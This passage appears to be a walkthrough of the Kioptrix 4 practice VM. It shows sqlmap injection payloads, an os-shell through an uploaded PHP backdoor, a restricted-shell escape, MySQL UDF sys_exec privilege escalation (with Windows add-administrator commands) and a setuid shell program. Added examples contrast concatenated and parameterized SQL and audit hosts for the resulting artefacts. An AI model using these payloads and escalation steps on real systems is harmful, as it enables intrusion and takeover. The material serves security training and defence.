Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:09:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:09:06] [INFO] going to use a web backdoor for command prompt
[02:09:06] [INFO] fingerprinting the back-end DBMS operating system
[02:09:06] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[02:09:08] [INFO] retrieved the web server document root: '/var/www'
[02:09:08] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[02:09:08] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[02:09:08] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpuadle.php
[02:09:08] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[02:09:08] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] 
[02:09:09] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpbcphh.php
[02:09:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] 
command standard output: 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] 
command standard output: 'www-data'
os-shell> cat checklogin.php
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:
---
&lt;?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
</pre><p>The privileges are low, but we have obtained the database credentials.</p><h3><a name='header-n10448' class='md-header-anchor '></a>Connecting over SSH</h3><p>Log in over SSH with the username and password obtained from the SQL injection:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh john@10.32.58.187
The authenticity of host '10.32.58.187 (10.32.58.187)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.32.58.187' (RSA) to the list of known hosts.
john@10.32.58.187's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ help
help
Limited Shell (lshell) limited help.
Cheers.
</pre><p>The commands available to us here are:</p><pre class="md-fences mock-cm md-end-block" lang="">cd  clear  echo  exit  help  ll  lpath  ls
</pre><p>The important one is <code>echo</code>.</p><p>We can use it to get an interactive <code>bash</code> shell:</p><pre class="md-fences mock-cm md-end-block" lang="">john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
</pre><p>The privileges are still those of the current user.</p><h3><a name='header-n10463' class='md-header-anchor '></a>Privilege escalation through MySQL</h3><p>Log in to MySQL with the database credentials obtained from the SQL injection:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3520
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> status;
--------------
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

Connection id:          3520
Current database:       
Current user:           root@localhost
SSL:                    Not in use
Current pager:          stdout
Using outfile:          ''
Using delimiter:        ;
Server version:         5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version:       10
Connection:             Localhost via UNIX socket
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
UNIX socket:            /var/run/mysqld/mysqld.sock
Uptime:                 1 hour 10 min 47 sec
</pre><p>Try <code>mysql udf</code> privilege escalation.</p><p>On Windows, the commands would be:</p><pre class="md-fences mock-cm md-end-block" lang="">USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
</pre><p>which achieves privilege escalation.</p><p>In our lab we perform the UDF privilege escalation on Linux.</p><p>First locate <code>lib_mysqludf_sys.so</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
</pre><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
ERROR 1125 (HY000): Function 'sys_exec' already exists
mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql

+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
| NULL                                                |
+-----------------------------------------------------+
1 row in set (0.00 sec)

mysql> quit
Bye
john@Kioptrix4:~$ cat /tmp/out
uid=0(root) gid=0(root)
</pre><p>This writes the output of the command run by <code>sys_exec()</code> to <code>/tmp/out</code>.</p><p>It shows that the command ran as root.</p><p>We could write a C program to execute commands:</p><pre class="md-fences mock-cm md-end-block" lang="">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;

int main(void)
{
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
</pre><p>Compile it locally and upload it to the target.</p><p>Downloading it with <code>wget</code> seemed to time out straight away; the firewall may be blocking the traffic.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> SELECT sys_exec('usermod -a -G admin');
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql> SELECT sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql

+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.07 sec)
</pre><p><code>SELECT sys_exec('usermod -a -G admin john');</code> adds <code>john</code> to the admin group (the first attempt above fails because the username is missing).</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:/tmp$ sudo su
[sudo] password for john: 
root@Kioptrix4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/tmp# whoami
root
</pre><p>And with that we have root privileges.</p></div> </body> </html>
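<p>The login bypass and error-based path disclosure on Kioptrix 4, like the union query on Kioptrix 3, come from user input concatenated into a SQL string. The following is an added example written for this page, not code from the Kioptrix boxes or from checklogin.php; it uses a constructed in-memory SQLite copy of a <code>members</code> table with made-up rows and shows the concatenated query beside its parameterized form. SQLite's comment sequence is <code>--</code>, so the payload is adapted from the MySQL <code>#</code> form used on the page.</p>

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the writeup's `members` table (made-up rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO members (username, password) VALUES (?, ?)",
        [("john", "correct-horse"), ("robert", "battery-staple")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The checklogin.php pattern: input pasted straight into the SQL string.

    A quote in either field rewrites the query; a malformed one raises the
    database error that, echoed to the browser, disclosed /var/www/checklogin.php.
    Returns the matched username or None.
    """
    sql = (
        "SELECT username FROM members WHERE username='%s' AND password='%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()  # may raise sqlite3.OperationalError
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same lookup with bound parameters: the inputs are compared as data only."""
    row = conn.execute(
        "SELECT username FROM members WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def compare(username, password):
    """Run both versions on the same input; a DB error is reported, never shown to users."""
    conn = make_db()
    try:
        vulnerable = login_vulnerable(conn, username, password)
    except sqlite3.OperationalError as exc:
        vulnerable = "error: %s" % exc
    return vulnerable, login_parameterized(conn, username, password)


if __name__ == "__main__":
    # Bypass payload adapted to SQLite ('--' comment instead of MySQL's '#').
    print(compare("admin", "' OR '1'='1'--"))   # ('john', None)
    print(compare("admin", "'"))                # (error string, None)
    print(compare("john", "correct-horse"))     # ('john', 'john')
```

<p>The concatenated query lets the password field turn into <code>... OR '1'='1'</code> and returns the first row; the bound version compares the same bytes as a literal password and finds nothing. Keeping the database error out of the HTTP response (log it server-side instead) removes the path disclosure the page relied on to find <code>checklogin.php</code>.</p>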
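<p>Each escalation step in these two writeups leaves a durable artefact on the host: a second uid-0 entry in <code>/etc/passwd</code>, a sudoers rule for an interactive editor or for <code>ALL</code>, membership of the <code>admin</code> group in <code>/etc/group</code>, <code>sys_exec</code> registered in <code>mysql.func</code>, and sqlmap's <code>tmp*.php</code> stager in the web root. The audit below is an added example, not from the page or either box; every sample file, the path <code>/usr/local/bin/ht</code>, the group id and the uids are constructed for the example, and it works on strings so it runs offline (read the real files in place of the constants to use it on a host).</p>

```python
import re

# Constructed sample files mirroring the artefacts the Kioptrix 3/4 steps leave
# behind; names, ids and paths are made up, not copied from either box.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
loneferret:x:0:0:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:dreg,,,:/home/dreg:/bin/bash
john:x:1002:1002:john,,,:/home/john:/bin/bash
"""
SAMPLE_SUDOERS = """Defaults env_reset
root       ALL=(ALL) ALL
%admin     ALL=(ALL) ALL
loneferret ALL=NOPASSWD: /usr/local/bin/ht
loneferret ALL=(ALL) ALL
"""
SAMPLE_GROUP = """root:x:0:
admin:x:115:john
john:x:1002:
"""
# Rows of mysql.func as (name, dl): the registration that makes sys_exec callable.
SAMPLE_MYSQL_FUNC = [("sys_exec", "lib_mysqludf_sys.so"), ("sys_eval", "lib_mysqludf_sys.so")]
# Web-root listing that includes two sqlmap-style stager names.
SAMPLE_DOCROOT = ["index.php", "checklogin.php", "tmpuadle.php", "tmpbcphh.php"]

# Programs that hand the caller a file editor (and so /etc/passwd, /etc/sudoers) under sudo.
INTERACTIVE_EDITORS = {"ht", "vi", "vim", "nano"}


def uid0_accounts(passwd_text):
    """Accounts other than root whose uid or gid is 0 (the /etc/passwd edit on Kioptrix 3)."""
    found = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 4 and parts[0] != "root" and "0" in (parts[2], parts[3]):
            found.append(parts[0])
    return found


def groups_of(user, group_text):
    """Groups listing `user` as a supplementary member (the usermod step on Kioptrix 4)."""
    groups = set()
    for line in group_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 4 and user in parts[3].split(","):
            groups.add(parts[0])
    return groups


def sudo_rules(sudoers_text):
    """Parse 'who host=(runas) TAG: cmd, cmd' lines into (who, [cmd, ...]) pairs."""
    rules = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        who, _, rest = line.partition(" ")
        _, _, commands = rest.partition("=")
        commands = re.sub(r"^\s*\([^)]*\)\s*", "", commands)  # drop the (runas) part
        commands = re.sub(r"\b[A-Z]+:\s*", "", commands)       # drop NOPASSWD: and similar tags
        rules.append((who, [c.strip() for c in commands.split(",") if c.strip()]))
    return rules


def risky_sudo_for(user, user_groups, sudoers_text):
    """Rules letting `user` (directly or via a %group) run ALL or an interactive editor."""
    hits = []
    for who, commands in sudo_rules(sudoers_text):
        if who != user and not (who.startswith("%") and who[1:] in user_groups):
            continue
        for cmd in commands:
            if cmd == "ALL" or cmd.split("/")[-1].split()[0] in INTERACTIVE_EDITORS:
                hits.append((who, cmd))
    return hits


def udf_functions(func_rows):
    """mysql.func entries backed by a UDF shared object (sys_exec, sys_eval)."""
    return [name for name, dl in func_rows if "udf" in dl.lower()]


def stager_files(names):
    """Files matching the tmp<letters>.php names sqlmap's --os-shell wrote in the page output."""
    return [n for n in names if re.fullmatch(r"tmp[a-z]+\.php", n)]


def audit(passwd_text, sudoers_text, group_text, func_rows, docroot, users):
    """Collect every finding in one dict so it can be asserted on or logged."""
    findings = {
        "uid0": uid0_accounts(passwd_text),
        "sudo": {},
        "udf": udf_functions(func_rows),
        "stagers": stager_files(docroot),
    }
    for user in users:
        hits = risky_sudo_for(user, groups_of(user, group_text), sudoers_text)
        if hits:
            findings["sudo"][user] = hits
    return findings


if __name__ == "__main__":
    result = audit(SAMPLE_PASSWD, SAMPLE_SUDOERS, SAMPLE_GROUP, SAMPLE_MYSQL_FUNC,
                   SAMPLE_DOCROOT, ["loneferret", "dreg", "john"])
    for key, value in result.items():
        print(key, value)
```

<p>On the constructed input the audit reports <code>loneferret</code> as a second uid-0 account with sudo rights to <code>ht</code> and <code>ALL</code>, <code>john</code> as reaching <code>ALL</code> through <code>%admin</code>, the two UDF registrations and the two stager files; <code>dreg</code> yields nothing. Each finding maps to one step of the writeups above, which is what makes them useful as post-incident checks.</p>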